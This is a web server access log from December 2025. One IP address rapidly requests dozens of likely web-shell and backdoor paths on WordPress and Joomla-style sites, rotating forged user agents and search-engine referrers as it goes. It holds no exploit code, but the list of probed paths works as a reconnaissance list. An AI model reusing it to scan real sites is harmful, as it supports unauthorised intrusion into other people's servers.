4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /assets/images/ HTTP/1.1" 200 1842 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /av.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /buy.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /cgi-bin/ HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /chosen.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:02 +0000] "GET /css/index.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /elp.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /images/ HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /index/function.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /inputs.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /mah.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:03 +0000] "GET /mah/function.php HTTP/1.1" 404 1251 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:04 +0000] "GET /mini.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:04 +0000] "GET /modules/mod_simplefileuploadv1.3/elements/ HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:04 +0000] "GET /new.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:04 +0000] "GET /options-reading.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:04 +0000] "GET /simple.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:05 +0000] "GET /uploads/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:05 +0000] "GET /modules/mod_simplefileuploadv1.3/elements/index.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:05 +0000] "GET /new.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:05 +0000] "GET /public/files/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:05 +0000] "GET /public/wp-content/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:06 +0000] "GET /radio.php HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:06 +0000] "GET /wp-admin/classwithtostring.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:06 +0000] "GET /wp-admin/includes/colour.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:06 +0000] "GET /wp-admin/index.php HTTP/1.1" 404 1251 "https://www.bing.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:06 +0000] "GET /wp-admin/js/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-admin/js/widgets/ HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-admin/wp-admins.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-blog.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-content/admin.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-content/et-cache/ HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:07 +0000] "GET /wp-content/index.php HTTP/1.1" 404 1251 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:08 +0000] "GET /wp-content/plugins/pwnd/as.php HTTP/1.1" 404 1251 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.189.112.79 - - [08/Dec/2025:11:06:08 +0000] "GET /wp-content/upgrade/index.php HTTP/1.1" 404 1251 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.189.112.79 - - [08/Dec/2025:11:06:08 +0000] "GET /wp-content/uploads/ HTTP/1.1" 404 1251 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.189.112.79 - - [08/Dec/2025:11:06:08 +0000] "GET /wp-content/uploads/index.php HTTP/1.1" 404 1251 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
